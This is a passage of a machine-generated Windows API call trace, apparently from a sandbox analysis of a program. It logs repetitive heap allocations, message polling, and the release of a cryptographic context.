HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0222.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0222.729] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0222.729] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0222.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0222.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0222.729] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.729] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0222.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0222.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.729] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0222.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0222.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0222.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0222.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0222.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0222.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0222.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0222.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0222.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0222.731] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.731] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0222.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0222.731] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0222.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0222.731] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0222.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0222.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0222.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0222.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0222.732] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.732] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0222.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.732] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0222.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0222.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0222.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0222.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0222.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0222.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.734] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0222.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0222.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0222.734] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0222.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0222.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0222.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0222.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0222.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0222.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0222.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0222.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0222.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0222.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0222.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0222.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0222.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0222.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0222.736] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0222.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0222.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0222.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0222.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.737] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0222.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0222.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0222.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: 